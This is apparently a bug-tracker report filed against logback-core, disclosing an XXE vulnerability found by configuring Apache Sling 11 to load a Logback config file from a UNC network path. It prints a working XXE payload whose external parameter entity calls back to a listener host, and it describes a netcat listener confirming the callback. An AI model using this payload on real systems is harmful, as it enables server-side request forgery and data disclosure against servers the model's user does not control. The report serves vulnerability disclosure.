Details

    • Type: Bug
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: 1.3.0-alpha6
    • Component/s: logback-core
    • Labels:
    • Environment:

      I test Apache Sling latest version 11 integrating Logback running on windows system 

      Description

      Hi,I find xxe vulnerability in Logback when testing Apache Sling latest version 11 integrating Logback.

      First I login in Sling as an admin.
      The vulnerable url is http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager.
      In the " Logback Config File "  field,I input "\\192.168.0.102\c$\xxe.xml" as shown below.

      The content of the xxe.xml under c:\  directory on the server 192.168.0.102 is 

      <?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">%sp;]>
       
       After click "save"  ,the netcat running on the server  192.168.0.102 and listening to the port 8090 receives the request as shown below.

       
      **

        Attachments

          Activity

            People

            • Assignee:
              logback-dev Logback dev list
              Reporter:
              shuiboye shuiboye
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: